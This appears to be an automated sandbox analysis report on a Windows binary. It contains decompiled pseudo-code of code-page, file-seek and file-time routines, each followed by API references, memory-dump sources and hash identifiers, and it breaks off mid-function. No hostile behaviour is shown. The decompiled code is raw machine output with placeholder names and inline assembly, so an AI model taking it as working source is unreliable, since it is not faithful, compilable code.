                                                    				_t48 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t48 ^ _t96;
                                                    				_t95 = _a8;
                                                    				_t75 = E00CEB7BB(__eflags, _a4);
                                                    				if(_t75 != 0) {
                                                    					_push(__edi);
                                                    					_t92 = 0;
                                                    					__eflags = 0;
                                                    					_t78 = 0;
                                                    					_t51 = 0;
                                                    					_v32 = 0;
                                                    					while(1) {
                                                    						__eflags =  *((intOrPtr*)(_t51 + 0xcfe978)) - _t75;
                                                    						if( *((intOrPtr*)(_t51 + 0xcfe978)) == _t75) {
                                                    							break;
                                                    						}
                                                    						_t78 = _t78 + 1;
                                                    						_t51 = _t51 + 0x30;
                                                    						_v32 = _t78;
                                                    						__eflags = _t51 - 0xf0;
                                                    						if(_t51 < 0xf0) {
                                                    							continue;
                                                    						} else {
                                                    							__eflags = _t75 - 0xfde8;
                                                    							if(_t75 == 0xfde8) {
                                                    								L23:
                                                    								_t60 = _t51 | 0xffffffff;
                                                    							} else {
                                                    								__eflags = _t75 - 0xfde9;
                                                    								if(_t75 == 0xfde9) {
                                                    									goto L23;
                                                    								} else {
                                                    									_t51 = IsValidCodePage(_t75 & 0x0000ffff);
                                                    									__eflags = _t51;
                                                    									if(_t51 == 0) {
                                                    										goto L23;
                                                    									} else {
                                                    										_t51 = GetCPInfo(_t75,  &_v28);
                                                    										__eflags = _t51;
                                                    										if(_t51 == 0) {
                                                    											__eflags =  *0xd226c4 - _t92; // 0x0
                                                    											if(__eflags == 0) {
                                                    												goto L23;
                                                    											} else {
                                                    												E00CEB82E(_t95);
                                                    												goto L37;
                                                    											}
                                                    										} else {
                                                    											E00CDFFF0(_t92, _t95 + 0x18, _t92, 0x101);
                                                    											 *(_t95 + 4) = _t75;
                                                    											 *(_t95 + 0x21c) = _t92;
                                                    											_t75 = 1;
                                                    											__eflags = _v28 - 1;
                                                    											if(_v28 <= 1) {
                                                    												 *(_t95 + 8) = _t92;
                                                    											} else {
                                                    												__eflags = _v22;
                                                    												_t71 =  &_v22;
                                                    												if(_v22 != 0) {
                                                    													while(1) {
                                                    														_t85 = _t71[1];
                                                    														__eflags = _t85;
                                                    														if(_t85 == 0) {
                                                    															goto L16;
                                                    														}
                                                    														_t89 = _t85 & 0x000000ff;
                                                    														_t86 =  *_t71 & 0x000000ff;
                                                    														while(1) {
                                                    															__eflags = _t86 - _t89;
                                                    															if(_t86 > _t89) {
                                                    																break;
                                                    															}
                                                    															 *(_t95 + _t86 + 0x19) =  *(_t95 + _t86 + 0x19) | 0x00000004;
                                                    															_t86 = _t86 + 1;
                                                    															__eflags = _t86;
                                                    														}
                                                    														_t71 =  &(_t71[2]);
                                                    														__eflags =  *_t71;
                                                    														if( *_t71 != 0) {
                                                    															continue;
                                                    														}
                                                    														goto L16;
                                                    													}
                                                    												}
                                                    												L16:
                                                    												_t72 = _t95 + 0x1a;
                                                    												_t84 = 0xfe;
                                                    												do {
                                                    													 *_t72 =  *_t72 | 0x00000008;
                                                    													_t72 =  &(_t72[1]);
                                                    													_t84 = _t84 - 1;
                                                    													__eflags = _t84;
                                                    												} while (_t84 != 0);
                                                    												 *(_t95 + 0x21c) = E00CEB77D( *(_t95 + 4));
                                                    												 *(_t95 + 8) = _t75;
                                                    											}
                                                    											asm("stosd");
                                                    											asm("stosd");
                                                    											asm("stosd");
                                                    											L36:
                                                    											E00CEB893(_t89, _t95); // executed
                                                    											L37:
                                                    											_t60 = 0;
                                                    											__eflags = 0;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    						_pop(_t91);
                                                    						goto L39;
                                                    					}
                                                    					E00CDFFF0(_t92, _t95 + 0x18, _t92, 0x101);
                                                    					_t54 = _v32 * 0x30;
                                                    					__eflags = _t54;
                                                    					_v36 = _t54;
                                                    					_t55 = _t54 + 0xcfe988;
                                                    					_v32 = _t55;
                                                    					do {
                                                    						__eflags =  *_t55;
                                                    						_t79 = _t55;
                                                    						if( *_t55 != 0) {
                                                    							while(1) {
                                                    								_t62 = _t79[1];
                                                    								__eflags = _t62;
                                                    								if(_t62 == 0) {
                                                    									break;
                                                    								}
                                                    								_t90 =  *_t79 & 0x000000ff;
                                                    								_t63 = _t62 & 0x000000ff;
                                                    								while(1) {
                                                    									__eflags = _t90 - _t63;
                                                    									if(_t90 > _t63) {
                                                    										break;
                                                    									}
                                                    									__eflags = _t90 - 0x100;
                                                    									if(_t90 < 0x100) {
                                                    										_t31 = _t92 + 0xcfe970; // 0x8040201
                                                    										 *(_t95 + _t90 + 0x19) =  *(_t95 + _t90 + 0x19) |  *_t31;
                                                    										_t90 = _t90 + 1;
                                                    										__eflags = _t90;
                                                    										_t63 = _t79[1] & 0x000000ff;
                                                    										continue;
                                                    									}
                                                    									break;
                                                    								}
                                                    								_t79 =  &(_t79[2]);
                                                    								__eflags =  *_t79;
                                                    								if( *_t79 != 0) {
                                                    									continue;
                                                    								}
                                                    								break;
                                                    							}
                                                    							_t55 = _v32;
                                                    						}
                                                    						_t92 = _t92 + 1;
                                                    						_t55 = _t55 + 8;
                                                    						_v32 = _t55;
                                                    						__eflags = _t92 - 4;
                                                    					} while (_t92 < 4);
                                                    					 *(_t95 + 4) = _t75;
                                                    					 *(_t95 + 8) = 1;
                                                    					 *(_t95 + 0x21c) = E00CEB77D(_t75);
                                                    					_t80 = _t95 + 0xc;
                                                    					_t89 = _v36 + 0xcfe97c;
                                                    					_t93 = 6;
                                                    					do {
                                                    						_t58 =  *_t89;
                                                    						_t89 = _t89 + 2;
                                                    						 *_t80 = _t58;
                                                    						_t80 = _t80 + 2;
                                                    						_t93 = _t93 - 1;
                                                    						__eflags = _t93;
                                                    					} while (_t93 != 0);
                                                    					goto L36;
                                                    				} else {
                                                    					E00CEB82E(_t95);
                                                    					_t60 = 0;
                                                    				}
                                                    				L39:
                                                    				return E00CDFBBC(_t60, _t75, _v8 ^ _t96, _t89, _t91, _t95);
                                                    			}

































                                                    0x00cebd89
                                                    0x00cebd8f
                                                    0x00cebd92
                                                    0x00cebda1
                                                    0x00cebdaa
                                                    0x00cebdaf
                                                    0x00cebdb5
                                                    0x00cebdb6
                                                    0x00cebdb6
                                                    0x00cebdb9
                                                    0x00cebdbc
                                                    0x00cebdbf
                                                    0x00cebdc2
                                                    0x00cebdc2
                                                    0x00cebdc2
                                                    0x00000000
                                                    0x00cebc16
                                                    0x00cebc17
                                                    0x00cebc1d
                                                    0x00cebc1d
                                                    0x00cebdd1
                                                    0x00cebde0

                                                    APIs
                                                      • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CEBA89,?,00000000), ref: 00CEBC64
                                                    • GetCPInfo.KERNEL32(00000000,00CEBA89,?,?,?,00CEBA89,?,00000000), ref: 00CEBC77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID:
                                                    • API String ID: 546120528-0
                                                    • Opcode ID: afdb3ecfec0c31f8371759568c61ad1bf5b31b963ccce7e9138e3e51b1325a42
                                                    • Instruction ID: 71cd51073b1634bc6441341065e3b7e72daab67f9279062a53dc5ee5a4624e46
                                                    • Opcode Fuzzy Hash: afdb3ecfec0c31f8371759568c61ad1bf5b31b963ccce7e9138e3e51b1325a42
                                                    • Instruction Fuzzy Hash: A7515470A047D59EDB208F77C8816BBBBE5EF41300F28446ED4A68B262D7359F46DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 60%
                                                    			E00CC9A74(signed int __ecx, long* _a4, signed int _a8, long _a12, signed int _a20, char _a24, long _a4124, long _a4128, long _a4132) {
                                                    				signed int _v0;
                                                    				long* _v4;
                                                    				intOrPtr _v8;
                                                    				void* _t30;
                                                    				long _t32;
                                                    				signed int _t33;
                                                    				void* _t35;
                                                    				long* _t38;
                                                    				void* _t41;
                                                    				long _t42;
                                                    				signed int _t46;
                                                    				long _t50;
                                                    				void* _t51;
                                                    				long _t52;
                                                    				intOrPtr* _t53;
                                                    				void* _t57;
                                                    				void* _t63;
                                                    				signed int _t67;
                                                    				signed int _t70;
                                                    
                                                    				E00CDEC50(0x1018);
                                                    				_t50 = _a4132;
                                                    				_t42 = _a4128;
                                                    				_t53 = __ecx;
                                                    				_t52 = _a4124;
                                                    				_v0 = __ecx;
                                                    				if( *((intOrPtr*)(__ecx + 8)) == 0xffffffff) {
                                                    					L21:
                                                    					_t30 = 1;
                                                    					L22:
                                                    					return _t30;
                                                    				}
                                                    				if( *((intOrPtr*)(__ecx + 0x10)) != 1) {
                                                    					__eflags = _t42;
                                                    					if(__eflags > 0) {
                                                    						L32:
                                                    						_a12 = _t42;
                                                    						_t32 = SetFilePointer( *(_t53 + 8), _t52,  &_a12, _t50); // executed
                                                    						__eflags = _t32 - 0xffffffff;
                                                    						if(_t32 != 0xffffffff) {
                                                    							goto L21;
                                                    						}
                                                    						_t33 = GetLastError();
                                                    						asm("sbb al, al");
                                                    						_t30 =  ~_t33 + 1;
                                                    						goto L22;
                                                    					}
                                                    					if(__eflags < 0) {
                                                    						L27:
                                                    						__eflags = _t50;
                                                    						if(_t50 == 0) {
                                                    							goto L32;
                                                    						}
                                                    						__eflags = _t50 - 1;
                                                    						if(_t50 != 1) {
                                                    							_t35 = E00CC981A(_t50);
                                                    						} else {
                                                    							 *0xcf3278();
                                                    							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0x14))))();
                                                    							_t53 = _v0;
                                                    						}
                                                    						_t52 = _t52 + _t35;
                                                    						asm("adc ebx, edx");
                                                    						_t50 = 0;
                                                    						__eflags = 0;
                                                    						goto L32;
                                                    					}
                                                    					__eflags = _t52;
                                                    					if(_t52 >= 0) {
                                                    						goto L32;
                                                    					}
                                                    					goto L27;
                                                    				}
                                                    				_t38 = __ecx + 0x28;
                                                    				_a4 = _t38;
                                                    				if(_t50 != 1) {
                                                    					__eflags = _t50;
                                                    					if(_t50 != 0) {
                                                    						L23:
                                                    						_t30 = 0;
                                                    						goto L22;
                                                    					}
                                                    					L5:
                                                    					_t63 = _t42 - _t38[1];
                                                    					if(_t63 < 0 || _t63 <= 0 && _t52 <  *_t38) {
                                                    						goto L23;
                                                    					} else {
                                                    						_t46 = _t42;
                                                    						_t57 = _t52 -  *_t38;
                                                    						asm("sbb ecx, [eax+0x4]");
                                                    						_a8 = _t46;
                                                    						if(_t57 != 0 || _t57 != 0) {
                                                    							do {
                                                    								_t67 = _t46;
                                                    								if(_t67 > 0 || _t67 >= 0 && _t57 >= 0x1000) {
                                                    									L14:
                                                    									_t12 =  &_a20;
                                                    									 *_t12 = _a20 & 0x00000000;
                                                    									__eflags =  *_t12;
                                                    									_t51 = 0x1000;
                                                    									goto L15;
                                                    								} else {
                                                    									_t51 = _t57;
                                                    									_a20 = _t46;
                                                    									L15:
                                                    									 *0xcf3278( &_a24, _t51);
                                                    									_t41 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0xc))))();
                                                    									if(_t41 <= 0) {
                                                    										goto L23;
                                                    									}
                                                    									_t46 = _v0;
                                                    									_t53 = _v8;
                                                    									asm("cdq");
                                                    									_t57 = _t57 - _t41;
                                                    									asm("sbb ecx, edx");
                                                    									_v0 = _t46;
                                                    									_t70 = _t46;
                                                    									if(_t70 > 0) {
                                                    										goto L14;
                                                    									}
                                                    								}
                                                    							} while (_t70 >= 0 && _t57 != 0);
                                                    							_t38 = _v4;
                                                    							goto L20;
                                                    						} else {
                                                    							L20:
                                                    							 *_t38 = _t52;
                                                    							_t38[1] = _t42;
                                                    							goto L21;
                                                    						}
                                                    					}
                                                    				}
                                                    				_t52 = _t52 +  *_t38;
                                                    				asm("adc ebx, [eax+0x4]");
                                                    				goto L5;
                                                    			}























                                                    APIs
                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CC9A50,?,?,00000000,?,?,00CC8CBC,?), ref: 00CC9BAB
                                                    • GetLastError.KERNEL32(?,00000000,00CC8411,-00009570,00000000,000007F3), ref: 00CC9BB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 12d676219fb2046c684498e276ce6d79fd9d8185fbad3d1d0190f71ce8b517ba
                                                    • Instruction ID: 69131f5ca6b02269df919dd46a9109f01b50819b166a60009209184bd9a576b0
                                                    • Opcode Fuzzy Hash: 12d676219fb2046c684498e276ce6d79fd9d8185fbad3d1d0190f71ce8b517ba
                                                    • Instruction Fuzzy Hash: 9F41DE71604341AFDB34DF15E5A8E6AB7E5FFD4320F158A2DE8A183260D770EE058A51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E00CEBA27(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
                                                    				char _v8;
                                                    				char _v16;
                                                    				void* __ebp;
                                                    				char _t31;
                                                    				signed int _t36;
                                                    				char _t40;
                                                    				intOrPtr _t44;
                                                    				char _t45;
                                                    				signed int _t51;
                                                    				void* _t64;
                                                    				void* _t70;
                                                    				signed int _t75;
                                                    				void* _t81;
                                                    
                                                    				_t81 = __eflags;
                                                    				_t68 = __edx;
                                                    				_v8 = E00CE97E5(__ebx, __ecx, __edx);
                                                    				E00CEBB4E(__ebx, __ecx, __edx, __edi, __esi, _t81);
                                                    				_t31 = E00CEB7BB(_t81, _a4);
                                                    				_v16 = _t31;
                                                    				_t57 =  *(_v8 + 0x48);
                                                    				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                    					return 0;
                                                    				}
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_t70 = E00CE8E06(_t57, 0x220);
                                                    				_t51 = __ebx | 0xffffffff;
                                                    				__eflags = _t70;
                                                    				if(__eflags == 0) {
                                                    					L5:
                                                    					_t75 = _t51;
                                                    					goto L6;
                                                    				} else {
                                                    					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                    					 *_t70 =  *_t70 & 0x00000000; // executed
                                                    					_t36 = E00CEBBF0(_t68, _t70, __eflags, _v16, _t70); // executed
                                                    					_t75 = _t36;
                                                    					__eflags = _t75 - _t51;
                                                    					if(_t75 != _t51) {
                                                    						__eflags = _a8;
                                                    						if(_a8 == 0) {
                                                    							E00CE8B6F();
                                                    						}
                                                    						asm("lock xadd [eax], ebx");
                                                    						__eflags = _t51 == 1;
                                                    						if(_t51 == 1) {
                                                    							_t45 = _v8;
                                                    							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xcfec70;
                                                    							if( *((intOrPtr*)(_t45 + 0x48)) != 0xcfec70) {
                                                    								E00CE8DCC( *((intOrPtr*)(_t45 + 0x48)));
                                                    							}
                                                    						}
                                                    						 *_t70 = 1;
                                                    						_t64 = _t70;
                                                    						_t70 = 0;
                                                    						 *(_v8 + 0x48) = _t64;
                                                    						_t40 = _v8;
                                                    						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                    						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                    							__eflags =  *0xcfeef0 & 0x00000001;
                                                    							if(( *0xcfeef0 & 0x00000001) == 0) {
                                                    								_v16 =  &_v8;
                                                    								E00CEB691(5,  &_v16);
                                                    								__eflags = _a8;
                                                    								if(_a8 != 0) {
                                                    									_t44 =  *0xcfee90; // 0x3392210
                                                    									 *0xcfe964 = _t44;
                                                    								}
                                                    							}
                                                    						}
                                                    						L6:
                                                    						E00CE8DCC(_t70);
                                                    						return _t75;
                                                    					} else {
                                                    						 *((intOrPtr*)(E00CE91A8())) = 0x16;
                                                    						goto L5;
                                                    					}
                                                    				}
                                                    			}

















                                                    APIs
                                                      • Part of subcall function 00CE97E5: GetLastError.KERNEL32(?,00D01098,00CE4674,00D01098,?,?,00CE40EF,?,?,00D01098), ref: 00CE97E9
                                                      • Part of subcall function 00CE97E5: _free.LIBCMT ref: 00CE981C
                                                      • Part of subcall function 00CE97E5: SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE985D
                                                      • Part of subcall function 00CE97E5: _abort.LIBCMT ref: 00CE9863
                                                      • Part of subcall function 00CEBB4E: _abort.LIBCMT ref: 00CEBB80
                                                      • Part of subcall function 00CEBB4E: _free.LIBCMT ref: 00CEBBB4
                                                      • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                    • _free.LIBCMT ref: 00CEBA9F
                                                    • _free.LIBCMT ref: 00CEBAD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorLast_abort
                                                    • String ID:
                                                    • API String ID: 2991157371-0
                                                    • Opcode ID: c59cbf1c9322bacdae0412e470c3ae4555fe7eeee0328ed43479d675cda7f7a0
                                                    • Instruction ID: 5a12a35f5d17fff7fa183d8c4747a45d32b951403726ea633d4499cc9f65f5aa
                                                    • Opcode Fuzzy Hash: c59cbf1c9322bacdae0412e470c3ae4555fe7eeee0328ed43479d675cda7f7a0
                                                    • Instruction Fuzzy Hash: B431AC31904189AFDF10DF6AE841BBEB7F5EF40324F2540A9E5149B2A1EB715E44FB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E00CC1E50(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
                                                    				void* _t38;
                                                    				intOrPtr _t47;
                                                    				void* _t68;
                                                    				unsigned int _t70;
                                                    				signed int _t72;
                                                    				intOrPtr* _t74;
                                                    				void* _t76;
                                                    
                                                    				_t68 = __edx;
                                                    				E00CDEB78(0xcf2673, _t76);
                                                    				_t55 = 0;
                                                    				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
                                                    				 *((intOrPtr*)(_t76 - 0x24)) = 0;
                                                    				 *(_t76 - 0x20) = 0;
                                                    				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
                                                    				 *((intOrPtr*)(_t76 - 0x18)) = 0;
                                                    				 *((char*)(_t76 - 0x14)) = 0;
                                                    				_push(0);
                                                    				_push(0);
                                                    				 *((intOrPtr*)(_t76 - 4)) = 0;
                                                    				_push(_t76 - 0x24);
                                                    				_t38 = E00CC3BBA(__ecx); // executed
                                                    				if(_t38 != 0) {
                                                    					_t70 =  *(_t76 - 0x20);
                                                    					E00CC1732(_t76 - 0x24, _t68, 1);
                                                    					_t74 =  *((intOrPtr*)(_t76 + 8));
                                                    					 *((char*)( *(_t76 - 0x20) +  *((intOrPtr*)(_t76 - 0x24)) - 1)) = 0;
                                                    					_t16 = _t70 + 1; // 0x1
                                                    					E00CC18A9(_t74, _t16);
                                                    					_t47 =  *((intOrPtr*)(_t76 - 0x10));
                                                    					if( *((intOrPtr*)(_t47 + 0x6cc8)) != 3) {
                                                    						if(( *(_t47 + 0x460c) & 0x00000001) == 0) {
                                                    							E00CD1B84( *((intOrPtr*)(_t76 - 0x24)),  *_t74,  *((intOrPtr*)(_t74 + 4)));
                                                    						} else {
                                                    							_t72 = _t70 >> 1;
                                                    							E00CD1BFD( *((intOrPtr*)(_t76 - 0x24)),  *_t74, _t72);
                                                    							 *((short*)( *_t74 + _t72 * 2)) = 0;
                                                    						}
                                                    					} else {
                                                    						_push( *((intOrPtr*)(_t74 + 4)));
                                                    						_push( *_t74);
                                                    						_push( *((intOrPtr*)(_t76 - 0x24)));
                                                    						E00CD1C3B();
                                                    					}
                                                    					E00CC18A9(_t74, E00CE3E13( *_t74));
                                                    					_t55 = 1;
                                                    				}
                                                    				_t39 =  *((intOrPtr*)(_t76 - 0x24));
                                                    				 *((intOrPtr*)(_t76 - 4)) = 2;
                                                    				if( *((intOrPtr*)(_t76 - 0x24)) != 0) {
                                                    					if( *((char*)(_t76 - 0x14)) != 0) {
                                                    						E00CCF445(_t39,  *((intOrPtr*)(_t76 - 0x1c)));
                                                    						_t39 =  *((intOrPtr*)(_t76 - 0x24));
                                                    					}
                                                    					L00CE3E2E(_t39);
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
                                                    				return _t55;
                                                    			}











                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC1E55
                                                      • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                    • _wcslen.LIBCMT ref: 00CC1EFD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$_wcslen
                                                    • String ID:
                                                    • API String ID: 2838827086-0
                                                    • Opcode ID: b7461bebbbc28144f026304d5a60f3a19d998612a225dcde454b1efdf13d348e
                                                    • Instruction ID: 4bb41acaba3304de715f7f26ee629f88f492358e10789995a741638a42564687
                                                    • Opcode Fuzzy Hash: b7461bebbbc28144f026304d5a60f3a19d998612a225dcde454b1efdf13d348e
                                                    • Instruction Fuzzy Hash: 4D314B71904249AFCF15EF9AC945EEEBBF6AF49300F1400AEF845A7252CB325E41DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 84%
                                                    			E00CC9DA2(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
                                                    				void* _v8;
                                                    				void* _v16;
                                                    				void* _v24;
                                                    				signed char _v25;
                                                    				signed char _v26;
                                                    				int _t35;
                                                    				signed char _t50;
                                                    				signed int* _t52;
                                                    				signed char _t58;
                                                    				void* _t59;
                                                    				void* _t60;
                                                    				signed int* _t61;
                                                    				signed int* _t63;
                                                    
                                                    				_t60 = __esi;
                                                    				_t59 = __ecx;
                                                    				if( *(__ecx + 0x20) != 0x100 && ( *(__ecx + 0x20) & 0x00000002) == 0) {
                                                    					FlushFileBuffers( *(__ecx + 8));
                                                    				}
                                                    				_t52 = _a4;
                                                    				_t50 = 1;
                                                    				if(_t52 == 0 || ( *_t52 | _t52[1]) == 0) {
                                                    					_t58 = 0;
                                                    					_v25 = 0;
                                                    				} else {
                                                    					_t58 = 1;
                                                    					_v25 = 1;
                                                    				}
                                                    				_push(_t60);
                                                    				_t61 = _a8;
                                                    				if(_t61 == 0) {
                                                    					L9:
                                                    					_v26 = 0;
                                                    				} else {
                                                    					_v26 = _t50;
                                                    					if(( *_t61 | _t61[1]) == 0) {
                                                    						goto L9;
                                                    					}
                                                    				}
                                                    				_t63 = _a12;
                                                    				if(_t63 == 0 || ( *_t63 | _a4) == 0) {
                                                    					_t50 = 0;
                                                    				}
                                                    				if(_t58 != 0) {
                                                    					E00CD138A(_t52, _t58,  &_v24);
                                                    				}
                                                    				if(_v26 != 0) {
                                                    					E00CD138A(_t61, _t58,  &_v8);
                                                    				}
                                                    				if(_t50 != 0) {
                                                    					E00CD138A(_t63, _t58,  &_v16);
                                                    				}
                                                    				asm("sbb eax, eax");
                                                    				asm("sbb eax, eax");
                                                    				asm("sbb eax, eax");
                                                    				_t35 = SetFileTime( *(_t59 + 8),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t50 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
                                                    				return _t35;
                                                    			}

















                                                    APIs
                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushTime
                                                    • String ID:
                                                    • API String ID: 1392018926-0
                                                    • Opcode ID: 9165b9b2bf9439e9ef5514f1f2df98d82bfb099046475bc9bdc00577840a9ad0
                                                    • Instruction ID: e02f98ade095a0571b626c3091a79e40a4c4dfa9c7643e11cbed70e07640cad1
                                                    • Opcode Fuzzy Hash: 9165b9b2bf9439e9ef5514f1f2df98d82bfb099046475bc9bdc00577840a9ad0
                                                    • Instruction Fuzzy Hash: 1221CE31248285ABC714DF24C899FAABBE4EF55304F08491DF8E687151D339EA0DDB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CC966E(void* __ecx, WCHAR* _a4100, signed char _a4104) {
                                                    				short _v0;
                                                    				signed int _t27;
                                                    				void* _t29;
                                                    				signed char _t38;
                                                    				signed int _t42;
                                                    				long _t45;
                                                    				void* _t46;
                                                    				long _t48;
                                                    
                                                    				E00CDEC50(0x1000);
                                                    				_t38 = _a4104;
                                                    				_t46 = __ecx;
                                                    				_t42 = _t38 >> 1;
                                                    				if((_t38 & 0x00000010) != 0) {
                                                    					L3:
                                                    					_t48 = 1;
                                                    					__eflags = 1;
                                                    				} else {
                                                    					_t52 =  *((char*)(__ecx + 0x30));
                                                    					if( *((char*)(__ecx + 0x30)) != 0) {
                                                    						goto L3;
                                                    					} else {
                                                    						_t48 = 0;
                                                    					}
                                                    				}
                                                    				 *(_t46 + 0x20) = _t38;
                                                    				_t45 = ((_t42 ^ 0x00000001) << 0x1f) + 0x40000000;
                                                    				_t27 =  *(E00CCC27E(_t52, _a4100)) & 0x0000ffff;
                                                    				if(_t27 == 0x2e || _t27 == 0x20) {
                                                    					if((_t38 & 0x00000020) != 0) {
                                                    						goto L8;
                                                    					} else {
                                                    						_t39 = _a4100;
                                                    						_t29 = _t27 | 0xffffffff;
                                                    					}
                                                    				} else {
                                                    					L8:
